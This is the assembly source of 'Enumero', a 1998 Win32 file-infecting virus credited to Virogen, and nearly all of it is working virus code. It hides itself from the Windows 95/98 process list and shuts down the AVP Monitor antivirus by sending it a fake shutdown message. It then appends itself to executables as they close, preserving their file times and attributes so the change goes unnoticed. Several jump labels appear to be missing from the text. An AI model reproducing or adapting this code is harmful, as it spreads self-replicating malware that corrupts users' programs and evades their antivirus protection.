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1174 lines
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; Enumero, (c)1998 by Virogen[NOP]
; http://virogen.cjb.net
; This is a fairly simple virus I whipped up REAL fast outta the
; existing enumiacs source. The only real thing I wanted to accomplish
; with this virus was full win32 support and demonstration of proper
; PE infection by appending at the end of the last object's virtual
; size, not physical size.
; OS: Win32 (win95/98/NT)
; Hosts: PE (Parastic - append to last object at obj_rva+obj_vsize
; No date/time change
; No attribute change
; Correct checksum set in header.
; Physical file size increase varies depending on file alignment
; and previous padding on last object.
; Characteristics: Memory resident. Infects PEs when they terminate. Note
; that the PE must have created a window sometime in
; its execution, it doesn't matter if this window
; is visible or not. Process hidden from win95/98
; process list.
; greetz: lapse,jp,vecna,darkman, and everyone else
include mywin.inc
ID_OFF equ 0ch ; offset of our marker in PE
physical_eip equ 400h ; physical eip
host_physical_eip equ physical_eip+(offset host_entry-offset vstart) ; physical eip of host entry set
VIRUS_SIZE equ 6656 ; size after vgalign
; max module/process names we can queue - keep in mind that each
; is allocated 256 bytes of memory
max_idx equ 300
.model flat,STDCALL
; our imported APIs for spawned virus - the spawned virus doesn't have to
; worry with manual importing nor delta offsets of course.
extrn ExitProcess:PROC
extrn EnumWindows:PROC
extrn SetPriorityClass:PROC
extrn GetCurrentProcess:PROC
extrn CloseHandle:PROC
extrn ReadFile:PROC
extrn WriteFile:PROC
extrn SetFilePointer:PROC
extrn GetModuleHandleA:PROC
extrn MapViewOfFile:PROC
extrn CreateFileMappingA:PROC
extrn UnmapViewOfFile:PROC
extrn SetEndOfFile:PROC
extrn SetFilePointer:PROC
extrn GetFileAttributesA:PROC
extrn SetFileAttributesA:PROC
extrn GetFileSize:PROC
extrn GetTickCount:PROC
extrn GetFileSize:PROC
extrn GetFileTime:PROC
extrn SetFileTime:PROC
extrn GetProcAddress:PROC
extrn CheckSumMappedFile:PROC
extrn PeekMessageA:PROC
extrn Sleep:PROC
extrn CopyFileA:PROC
extrn FindWindowA:PROC
extrn GetWindowThreadProcessId:PROC
extrn OpenProcess:PROC
extrn PostMessageA:PROC
extrn GetModuleFileNameA:PROC
extrn LoadLibraryA:PROC
extrn FreeLibrary:PROC
extrn IsBadReadPtr:PROC
org 0
db '<27> [Enumero] by Virogen [NOP] <20>' ; it's i said the fly
call geteip ; find relative offset
mov ebp,[esp] ; grab it off stack
mov eax,ebp ; used below
sub ebp,offset geteip ; fix it up
add esp,4 ; fix da stack
; first, let's find kernel base. If this is a parastic portion of virus
; executing, we'll need to obtain a few APIs in order to spawn the virus.
; Here we get a pointer to the kernel from the stack (a return address).
; Then we scan down until we find the kernel base.
; We encapsulate this with an SEH handler, in case something goes bad wrong
; we simply immediatly jump to the host (if this is a parastic copy of the
; virus).
call set_seh ; setup SEH frame
;-- error handler
mov esp,[esp+8]
call geteip3
pop ebp
sub ebp,offset geteip3
jmp seh_exit
;-- end error handler
push dword ptr fs:[0] ; save old exception ptr
mov fs:[0],esp ; set ptr to our exception handler
mov edx,[esp+8] ; determine OS
cmp dword ptr [edx+0b4h],edx ; if we're at base, then
jz good_os ; offset 0b4h contains kernel
dec edx ; base
jmp find_base_loop
mov [ebp+kernelbase],edx ; save kernel base
; this is my API importer from lorez, imports APIs from the kernel32.dll
; export table in memory. Someday I will recode this in a more efficient
; fashion, but I am too lazy today.
; a brief explanation of the organization of the export table would be
; useful here. Ok, basically there are three tables within the export
; table : API RVA Table (32bit), Name Pointer Table(32bit), and Ordinal
; Table (16bit). Ok, the ordinal number of an API is the entry number of
; the API in the RVA array. So, multiply the ordinal number by four and
; you've got an index into the API RVA Table. Probably you don't already
; have the ordinal number though, so you'll have to find it. To do this,
; you use the Name Pointer Table. This is an array of pointers to the
; asciiz name of each API. When you find the pointer of the API you're
; looking for by string compares, you take the index number of it and
; multiply it by 2 (because the ordinal table is 16bit). Index the result
; in the ordinal table, and you're all set.
mov esi,edx
add esi,[esi+3ch] ; relative ptr to PE header
cmp word ptr [esi],'EP' ; make sure we're on right track
jnz goto_host ; if not.. abort
mov esi,[esi+120] ; get export table RVA
add esi,edx ; relative to image base
mov edi,[esi+36] ; get ordinal table RVA
add edi,edx ; relative to image base
mov [ebp+ordinaltbl],edi ; save it
mov edi,[esi+32] ; get name ptr RVA
add edi,edx ; is relative to image base
mov [ebp+nameptrtbl],edi ; save it
mov ecx,[esi+24] ; get number of name ptrs
mov esi,[esi+28] ; get address table RVA
add esi,edx ; is relative to image base
mov [ebp+adrtbl],esi ; save it
xor edx,edx ; edx is our ordinal counter
; edi=name ptr table
; ecx=number of name ptrs
lea esi,[ebp+APIs] ; -> API Name ptrs
mov [ebp+ourAPIptr],esi ; save it
lea eax,[ebp+API_Struct] ; our API address will go here
mov [ebp+curAPIptr],eax ; save it
mov esi,[ebp+ourAPIptr] ; get ptr to structure item
mov ebx,[esi] ; load ptr to our API name
add ebx,ebp ; add relative address
mov esi,[edi] ; get API name RVA
add esi,[ebp+kernelbase] ; relative to image base
cmp al,byte ptr [ebx] ; compare a byte of names
jnz not_our_API ; it's not our API
cmp al,0 ; end of string?
jz is_our_API ; it's our API
inc ebx
jmp compare_API_name
inc edx ; increment API counter
cmp edx,ecx ; last entry of name ptr table?
jz goto_host ; uhoh.. we didn't find one
; of our APIs.. abort it all
add edi,4 ; increment export name ptr idx
mov esi,[ebp+ourAPIptr] ; restore our API name ptr struct
jmp chk_next_API_name
mov edi,[ebp+ordinaltbl] ; load oridinal table RVA
push ecx
push edx
xchg edx,eax ; edx=API number
add eax,eax ; *2 cuz ordinals are words
add edi,eax ; add to ordinal table VA
mov ax,[edi] ; get ordinal (word)
xor edx,edx
mov ecx,4
mul ecx ; *4 cuz address tbl is dd's
mov edi,[ebp+adrtbl] ; load address table VA
add edi,eax ; set idx to API
mov eax,edi
sub eax,[ebp+kernelbase] ; get the VA of the entry
mov [ebp+originalRVAptr],eax ; save it for kernel infection
; notice that our last API
; in the array is the one we
; hook
mov eax,[edi] ; get API RVA
mov [ebp+originalRVA],eax ; save it for kernel infection
add eax,[ebp+kernelbase] ; is relative to image base
mov edi,[ebp+curAPIptr] ; idx to storage stucture
mov [edi],eax ; save VA of API
add edi,4 ; increment index
mov [ebp+curAPIptr],edi ; save
pop edx
pop ecx
mov edi,[ebp+nameptrtbl] ; reset export name ptr tableidx
mov esi,[ebp+ourAPIptr] ; restore idx to our name ptrs
add esi,4 ; increment idx API name ptr structure
mov [ebp+ourAPIptr],esi ; save our new ptr to name ptr
cmp dword ptr [esi],0 ; end of our API structure?
jz found_all ; if so then we got 'em all
mov edi,[ebp+nameptrtbl] ; reset idx to export name pt
xor edx,edx ; reset API counter
jmp chk_next_API_name
; now we've imported all our needed APIs to spawn the virus and execute.
; First we check to see if this is spawned or parastic copy by checking
; delta offset.
or ebp,ebp ; spawned file or 1st gen?
jz spawned_func
; if parastic copy of virus, then spawn virus and execute it.
push 275
push 64 ; allocate memory for spawn
call [ebp+GlobalAllocAPI] ; path and filename
or eax,eax
jz goto_host
xor ecx,ecx
call GetVirusPathFile
mov [ebp+spawnfile],eax ; eax->sysdir/spawnfilename buffer
push eax ; save it fer later
push eax
call [ebp+DeleteFileAPI] ; attempt to delete
; now we spawn a copy of the virus. If there is an error creating the
; spawn file, then that means it is probably shared and therefore already
; in memory.
pop esi ; esi->spawn filename
call Create ; CreateFile
cmp eax,-1 ; if error, then we're already in mem
jz dealloc_goto_host
push eax ; save handle
mov ecx,VIRUS_SIZE
mov esi,ebp
add esi,offset vstart-physical_eip
call Write ; write our virus
call [ebp+CloseFileAPI] ; handle still on stack
lea eax,[ebp+sinfo] ; overwrite some other unused vars
push eax
call [ebp+GetStartupInfoAPI] ; get startup info of process
lea eax,[ebp+pinfo] ; storage for process info
push eax
lea eax,[ebp+sinfo] ; startup info
push eax
push 0
push 0
push 0
push 0
push 0
push 0
mov esi,[ebp+spawnfile] ; esi->spawn sysdir/file
push esi
call [ebp+CreateProcessAPI] ; create our viral process
mov eax,[ebp+hprocess]
push eax
call [ebp+CloseHandleAPI] ; close handle of our process
mov eax,[ebp+spawnfile]
push eax
call [ebp+GlobalFreeAPI]
or ebp,ebp ; if spanwed
jz _exit
; Here we calculate the image base, in case this executable was loaded at a base other
; than the one specified in the PE header.
call get_ib_displacement
mov ebx,newep[ebp]
add ebx,(offset get_ib_displacement-offset vstart)
pop eax
sub eax,ebx ; eax=image base
add host_entry[ebp],eax ; add image base to host entry rva
pop dword ptr fs:[0] ; restore original SEH frame
pop edx ; fixup stack
jmp [ebp+host_entry] ; jmp to host entry VA
host_entry dd offset vstart ; store host entry here
newep dd 0
; spawned virus code - we can throw away delta offsets now. This is
; the portion of the virus that stays resident.
pop dword ptr fs:[0] ; restore original SEH frame
pop edx ; fixup stack
xor ebp,ebp ; no delta offset
; first call PeekMessage so that the hourglass icon isn't displayed until
; timeout
push 0
push 1
push 0
push 0
push offset msgstruct
call PeekMessageA
; here we try to get the address of RegisterServiceProcess, which will
; allow us to register as a service process under win95/98, therefore
; hiding us from the ctrl-alt-del process list. This API not available
; under WinNT, so we import it manually to make sure that it exists, we
; don't need any ivalid ordinal numbers on spawned virus loadup.
; While we're at it, we'll also attempt to import the address of our
; GetWindowModuleFileNameA from USER32.DLL. If this API doesn't exist,
; which it is a fairly new API, then we just pass control to the host.
push offset user32
call GetModuleHandleA ; get handle of user32.dll
or eax,eax
jz _exit ; it should have been loaded
push offset GetWindowModuleFileName
push eax
call GetProcAddress
or eax,eax ; if we don't have this API, then
jz _exit ; we must be in old NT or 95 crap
mov GetWindowModuleFileNameA,eax
push offset kernel32
call GetModuleHandleA
or eax,eax
jz _exit ; something bad wrong if this
push offset RegisterService
push eax
call GetProcAddress ; get rsp address
or eax,eax
jz isNT ; if not found, then NT system
push 1 ; 1=register process
push 0 ; null=current process
call eax ; RegisterServiceProcess
jmp is9598
; Under WinNT we'll make use of PSAPI.DLL functionz to retrieve module filenames.
; We'll grab the address of GetModuleFileNameEx and EnumProcessModules
push offset psapi
call LoadLibraryA
or eax,eax
jz is9598
mov phandle,eax
push offset EnumPModules
push eax
call GetProcAddress
mov EnumProcessModules,eax
or eax,eax
jz unload_psapi
push offset GetMFileName
push phandle
call GetProcAddress
mov GetModuleFileNameEx,eax
or eax,eax
jz unload_psapi
jmp is9598
push phandle
call FreeLibrary
; get rid of AVP Monitor by simulating a system shutdown, sending WM_ENDSESSION to
; its window
push offset avp_wndname ; AVP window name
push 0 ; class name
call FindWindowA ; Find AVP
or eax,eax ; get handle?
jz no_avp ; if not, then abort
push 0 ; no lparam
push 0 ; or wparam
push WM_ENDSESSION ; WM_ENDSESSION generated at system shutdown
push eax ; handle to window
call PostMessageA ; Post the message
; allocate memory for, and load our virus for later infection
push 280
push 64
call [GlobalAllocAPI] ; allocate memory for del buf
or eax,eax
jz _exit
mov del_buf,eax
push 64
call [GlobalAllocAPI]
or eax,eax
jz _exit
mov virus_mem,eax
xor ecx,ecx ; return exe filename
call GetVirusPathFile
add eax,280
inc ecx ; ecx!=0 get temp filename
call GetVirusPathFile
push eax ; save for below
push 0
push eax
sub eax,280
push eax
call CopyFileA
pop esi ; esi->tmp filename
call OpenRead
cmp eax,-1
jz dealloc_exit
mov esi,virus_mem
mov ecx,VIRUS_SIZE
push eax ; save handle for close
call Read
cmp bytesread,VIRUS_SIZE
jnz dealloc_exit
call CloseHandle ; handle still on stack
mov eax,del_buf
inc ecx ; retrieve temp filename
call GetVirusPathFile ; get temp filename again
push eax
Call [DeleteFileAPI] ; delete temp file
jmp continue_spawned
push del_buf
call [GlobalFreeAPI]
push virus_mem
call [GlobalFreeAPI] ; handle to mem still on stack
jmp _exit
; now we need to allocate memory for our array
push 256*max_idx+1
push 64 ; GPTR - fixed, zero init
call [GlobalAllocAPI] ; allocate memory for our array
or eax,eax ; error allocating? exit
jz dealloc_exit
mov pnames,eax
push 1000h
push 64 ; allocate memory for modules enumeration
call [ebp+GlobalAllocAPI] ;
or eax,eax
jz dealloc_exit
mov mod_array,eax
call GetCurrentProcess ; get current process handle
push 64 ; idle priority class
push eax ; handle of current process
call SetPriorityClass ; set priority to idle
mov testnums,0 ; enumerate and load
call InstallEnum ; first enumeration
; This is our memory resident loop. What this does is every 1 second
; check the number of windows open by re-enumerating them. If this number
; differs from the last # of open windows, then we go and try to infect
; all the queued processes, in hopes that one has closed and is suitable
; for infection. We try to infect the queued processes about 10 times with
; a quarter second delay between each, or until we at least can open one of
; the files, this is just in case the window was closed but we still need
; to give the process time to terminate.
push 500 ; 1/2 second sleep
call Sleep ; suspend process for 1/2 second
mov testnums,1 ; just check number of windows
call InstallEnum ; get number of windows
mov eax,totalwnd ; get total windows from last en&l
cmp testednums,eax
jz main_loop ; if equal keep enumerating
mov icnt,0 ; we want to keep trying to infect
call Infect ; infect if different # of windows open
cmp re_enum,0
jnz over_i ; if infected a file, then abort
push 250 ; 1/4 second
call Sleep ; suspend process for 1/4 second
inc icnt ; increment counter
cmp icnt,10 ; we'll try 10 times
jnz do_i
mov testnums,0 ; enumerate and load windows
call InstallEnum
jmp main_loop ; we'll want something else here..
; may eat up too much cpu time
; some waitforsingleobject variation
push 0
call ExitProcess
; This procedure enumerates the windows using EnumWindows. See
; EnumWindowsProcedure below, which is called for each window found.
InstallEnum proc
cmp testnums,1
jz jdoit
mov totalwnd,0
mov totalexe,0
mov eax,pnames
mov curpos,eax
mov testednums,0
push 9090h
push offset EnumWindowsProc
call EnumWindows ; set up window enumeration
InstallEnum endp
; EnumWindowsProc - this procedure is called for every window found.
EnumWindowsProc proc uses ebx edi esi, hwnd:DWORD, lparam:DWORD
cmp testnums,1 ; only testing num of windows?
jz enum_only ; if so just increment counter
cmp totalexe,max_idx ; filled our array?
jge not_exe ; if so just increment counter
mov eax,GetWindowModuleFileNameA
or eax,eax
jz is_old_win
push 255 ; maximum size of path&filename + null
push curpos ; pointer to current member of array
push hwnd ; handle of window
call eax ; get associated module filename
or eax,eax ; error - must be NT
jnz got_fname_ok
; this is NT specific code
; If we couldn't
cmp EnumProcessModules,0 ; make sure we got api va
jz bad_abort
cmp GetModuleFileNameEx,0 ; make sure we got api va
jz bad_abort
push offset pid
push hwnd
call GetWindowThreadProcessId ; get process id
push pid
push 0
call OpenProcess ; open da process
mov phandle,eax
or eax,eax
jz bad_abort
push offset bytesread
push 1000h
push mod_array
push phandle
call [EnumProcessModules] ; enumerate process modules
mov esi,mod_array
or eax,eax
jz abortmodloop
push 255 ; maximum size of path&filename + null
push curpos ; pointer to current member of array
push eax
push phandle
call [GetModuleFileNameEx] ; get associated module filename
call testexe
jc getmodloop ; if not exe then keep scanning
push eax
push phandle
call CloseHandle
pop eax
call testexe
jc not_exe ; if not, then don't add to pointer
add curpos,256 ; increment pointer to next member of array
inc totalexe ; increment total #s of EXEs found
inc totalwnd ; increment total number of window
inc testednums
EnumWindowsProc endp
; here we search the saved process filenames and try to infect each one
Infect proc
mov esi,pnames ; pointer to allocated array
sub esi,256 ; member -1, will make 0 in loop
mov curidx,-1 ; will increment to 0
mov re_enum,0 ; if we infected flag
inc curidx ; increment current member of array
add esi,256 ; increment index into array
mov eax,totalexe ; get total EXEs we found in enumer
cmp curidx,eax ; we exceeded that amount?
jg abloop ; if so we're done
push esi ; esi->array member (filename); save
call OpenFile ; try and open it
pop esi ; restore ptr to filename
cmp eax,-1 ; error opening file?
jz iloop ; if so skip to next member of array
mov fnameptr,esi ; else save the filename pointer
push eax ; eax=handle of file
call CloseHandle ; close the file
push esi
call InfectFile ; infect the file
pop esi
mov re_enum,1 ; set successful infectin flag
jmp iloop ; continue trying to infect
Infect endp
testexe proc
or eax,eax
jz return_stc
mov ecx,eax ; ecx=size of path&filename of module
add ecx,curpos ; set up pointer to end of path&filename
sub ecx,3 ; extension starts here
cmp word ptr [ecx],'XE' ; make sure it's EXE
jz return_clc
cmp word ptr [ecx],'xe'
jz return_clc
testexe endp
; return pointer to virus path and filename
; entry: eax->buffer
; ecx=0 if exe file, 1 if tmp file
; return: eax->buffer
GetVirusPathFile proc
push eax
push ecx
push eax
push 260 ; max path size
push eax ; ptr
call [ebp+GetSysDirAPI] ; get sys directory
pop edi ; edi->sys directory
add edi,eax ; edi->end of dir
pop ecx
or ecx,ecx
jnz tmpname
lea esi,[ebp+virusname] ; esi->spawn filename
jmp append
lea esi,[ebp+tempname]
call copy_str ; append to sys dir
pop eax
GetVirusPathFile endp
mov ecx,3
mov ebx,80000000h
jmp or
mov ecx,1
jmp of
OpenFile proc
mov ecx,3
mov ebx,0c0000000h
push 0
push 20h ; attribute normal
push ecx ; 3=open existing file
push 0
push 0
push ebx ; permissions
push esi
call [ebp+CreateFileAPI]
OpenFile endp
Read proc
push 0
push offset bytesread
push ecx
push esi
push eax
call ReadFile
Read endp
Write proc
push 0
lea ebx,[ebp+bytesread]
push ebx
push ecx
push esi
push eax
call [ebp+WriteFileAPI]
Write endp
; infect file - call with fnameptr set
; As you can see, we append to the last object at RVA+virtual size
; and then set physical size to file_align(obj_virtual_size+
; virus_physical_size). In this way, we take advantage of any padded
; space in the last object therefore decreasing the physical size
; increase of the host.
; It is my contention, that since the virtual size usually represents
; the true unaligned physical size, appending should always occur
; at the end of the virtual size and then the physical size should
; be aligned to the new virtual size.
InfectFile proc
mov eax,fnameptr
push eax
call GetFileAttributesA ; get file attributes
mov oldattrib,eax
cmp eax,-1 ; if error then maybe shared
jnz not_shared
ret ; can't infect it
push 20h ; +A
mov eax,fnameptr
push eax
call SetFileAttributesA ; clear 'da attribs
mov esi,fnameptr
call OpenFile
cmp eax,-1
jnz open_ok
mov handle,eax
push offset creation
push offset lastaccess
push offset lastwrite
push eax
call GetFileTime ; grab the file time
xor ecx,ecx ; only map size of file
call create_mapping ; create file mapping
jc abort_infect
; eax->mapped file
cmp word ptr [eax],'ZM' ; is EXE?
jnz abort_infect
call GetPEHeader ; load esi->PE Header
push 2
push esi ; test ptr for read acces
call IsBadReadPtr ; was ptr any good?
or eax,eax
jnz abort_infect
cmp word ptr [esi],'EP' ; PE?
jnz abort_infect
cmp dword ptr [esi+ID_OFF],0 ; any value here?
jnz abort_infect ; if yes, infected
call unmap ; unmap file
mov ecx,VIRUS_SIZE+1000h ; add max virus size to map size
call create_mapping ; map file again
jc abort_infect
call GetPEHeader ; load esi -> pe header
call GetTickCount ; get tick count
mov dword ptr [esi+ID_OFF],eax ; save as infect flag
xor eax,eax
mov ax, word ptr [esi+NtHeaderSize] ; get header size
add eax,18h ; object table is here
mov edi,esi
add edi,eax ; edi->object table
xor eax,eax
mov ax,[esi+numObj] ; get number of objects
dec eax ; we want last object
mov ecx,40 ; each object 40 bytes
xor edx,edx
mul ecx ; numObj-1*40=last object
add edi,eax ; edi->last obj
mov eax,[edi+objpoff] ; get last object physical off
mov lastobjimageoff,eax ; save it
mov ecx,[edi+objpsize] ; get physical size of object
mov eax,[edi+objvsize] ; get object virtual size
push eax ; save virtual size
push ecx ; save original p size
mov originalvsize,eax ; save it 4 later
add eax,VIRTUAL_SIZE ; add our virtual size
mov dword ptr [edi+objvsize],eax ; save new virtual size
mov ecx,[esi+filealign] ; physical size=filealign(vsize)
call align_fix ; align new vsize to be psize
mov [edi+objpsize],eax ; save new physical size
mov newpsize,eax ; store it for exe size calc
push eax
mov ecx,dword ptr [esi+objalign] ; get object alignment
mov eax,dword ptr [edi+objvsize] ; add virtual size
add eax,dword ptr [edi+objrva] ; +last object rva
call align_fix ; set on obj alignment
mov dword ptr [esi+imagesize],eax ; save new imagesize
mov [edi+objflags],0E0000060h ; set object flags r/w/x
pop ecx ; restore new phsyical size
pop eax ; original psize
sub ecx,eax
mov diffpsize,ecx
pop eax ; restore orginal virtual size
add eax,[edi+objrva] ; add last object's RVA
; eax now RVA of virus code
add eax,physical_eip ; add physical eip:
mov ebx,[esi+entrypointRVA] ; get original entry
mov [esi+entrypointRVA],eax ; put our RVA as entry
mov ecx,[ebp+virus_mem]
add ecx,host_physical_eip
mov [ecx],ebx ; save host e RVA
add ecx,4
mov [ecx],eax ; save virus e RVA
push esi
mov edi,map_ptr
add edi,originalvsize ; restore original virtual size
add edi,lastobjimageoff ; add object physical offset
; edi->physical end of object
mov esi,virus_mem ; esi->virus
mov ecx,VIRUS_SIZE
rep movsb ; copy virus to host
pop esi
mov ecx,lastobjimageoff
add ecx,newpsize
mov fsize,ecx ; store new filesize
push ecx ; ecx=real file size
call unmap ; unmap file
pop ecx
push FILE_BEGIN ; from file begin
push 0 ; distance high
push ecx ; distance low
push handle
call SetFilePointer ; move file pointer to
; real EOF
push handle
call SetEndOfFile ; set end of file
; now we need to calculate checksum. We need to remap the file to get it
; right after file size change. I might be wrong about this, there could
; have been a bug in my code, but it seems resonable.
xor ecx,ecx
call create_mapping
jc unmapped
mov esi,[eax+3ch]
add esi,eax ; esi->pe header
lea eax,[esi+checksum]
push eax ; destination of checksum in hdr
push offset oldchksum
push fsize ; new file size
mov eax,map_ptr
push eax
call CheckSumMappedFile
call unmap
jmp unmapped
call unmap ;unmap if aborted infection
push offset creation
push offset lastaccess
push offset lastwrite
push handle
call SetFileTime ; restore orginal file time
push handle
call CloseHandle
mov eax,oldattrib ; get original attribs
push eax
mov eax,fnameptr
push eax
call SetFileAttributesA ; restore the original attributes
InfectFile endp
GetPEHeader proc
mov esi,[eax+3Ch] ; where PE hdr pointer is
add esi,eax
GetPEHeader endp
; create_mapping - create file mapping of [handle]
; entry: ecx=mapping size
create_mapping proc
push ecx ; save mapping size
push 0 ; high fsize storage, not needed
push handle ; file handle
call GetFileSize
call test_error
jc create_abort
mov fsize,eax
pop ecx ; restore map size
push 0 ; no map name
add eax,ecx
push eax ; low size+vs
push 0 ; high size
push PAGE_READWRITE ; read&write
push 0
push handle
call CreateFileMappingA
call test_error
jc create_abort
mov maphandle,eax
push 0 ; # of bytes, 0= map entire file
push 0 ; file offset low
push 0 ; file offset high
push FILE_MAP_WRITE ; access flags - read&write
push eax ; handle
call MapViewOfFile
call test_error
jc create_abort
mov map_ptr,eax
create_mapping endp
; test_error - test API for an error return
; entry: eax=API return
; returns: carry if error
test_error proc
cmp eax,-1
jz api_err
or eax,eax
jz api_err
test_error endp
; unmap file - Unmap view of file
push map_ptr
call UnmapViewOfFile
push maphandle
call CloseHandle
; sets eax on alignment of ecx
xor edx,edx
div ecx ; /alignment
or edx,edx ; check for remainder
jz no_inc
inc eax ; next alignment
mul ecx ; *alignment
; copy string
; pass edi->destination esi->source
; we could use lstrcat for this purpose, but oh well
mov ecx,0FFh ; no bigger than 256
cmp al,0
jz copystrdone
loop copystr
APIs: ; structure of ptrs to our API names
dd offset CreateFile
dd offset CloseHandleS
dd offset WriteFileS
dd offset CloseFile
dd offset GetSysDir
dd offset DeleteFile
dd offset CreateProc
dd offset GetStartUp
dd offset GlobalAlloc
dd offset GlobalFree
dd 0
; our API names
CreateFile db 'CreateFileA',0
CloseHandleS db 'CloseHandle',0
WriteFileS db 'WriteFile',0
CloseFile db 'CloseHandle',0
GetSysDir db 'GetSystemDirectoryA',0
DeleteFile db 'DeleteFileA',0
CreateProc db 'CreateProcessA',0
GetStartUp db 'GetStartupInfoA',0
GlobalAlloc db 'GlobalAlloc',0
GlobalFree db 'GlobalFree',0
API_Struct: ; structure for API VAs
CreateFileAPI dd 0
CloseHandleAPI dd 0
WriteFileAPI dd 0
CloseFileAPI dd 0
GetSysDirAPI dd 0
DeleteFileAPI dd 0
CreateProcessAPI dd 0
GetStartupInfoAPI dd 0
GlobalAllocAPI dd 0
GlobalFreeAPI dd 0
virusname db '\enumero.exe',0
tempname db '\temp.tmp',0
RegisterService db 'RegisterServiceProcess',0
GetWindowModuleFileName db 'GetWindowModuleFileNameA',0
EnumPModules db 'EnumProcessModules',0
GetMFileName db 'GetModuleFileNameExA',0
EnumProcessModules dd 0
GetModuleFileNameEx dd 0
GetWindowModuleFileNameA dd 0
kernel32 db 'KERNEL32.DLL',0
user32 db 'USER32.DLL',0
psapi db 'PSAPI.DLL',0
avp_wndname db 'AVP Monitor',0
curpos dd 0 ; ptr to cur member of array
pnames dd 0 ; ptr to process names
totalexe dd 0
totalwnd dd 0
testnums dd 0 ; bool
testednums dd 0
curidx dd 0
icnt dd 0
re_enum db 0
bytesread dd 0
handle dd 0 ; file handle
pinfo: ; process information
hprocess dd 0
pid dd 0
maphandle dd 0
map_ptr dd 0
nameptrtbl dd 0
fsize dd 0
adrtbl dd 0
oldattrib dd 0 ; stored file attribs
ourAPIptr dd 0
curAPIptr dd 0
ordinaltbl dd 0
kernelbase dd 0
originalRVAptr dd 0 ; RVA ptr to our hooked API RVA
originalRVA dd 0 ; orginal RVA of our hooked API
diffpsize dd 0
originalvsize dd 0
lastobjimageoff dd 0
creation dd 0,0 ; our file time structures
lastaccess dd 0,0
lastwrite dd 0,0
fnameptr dd 0 ; ptr to file name we're inf
spawnfile dd 0
virus_mem dd 0
phandle dd 0
newpsize dd 0
mod_array dd 0 ; ptr to allocated module array
del_buf dd 0 ; ptr to allocated delete buf memory
end vstart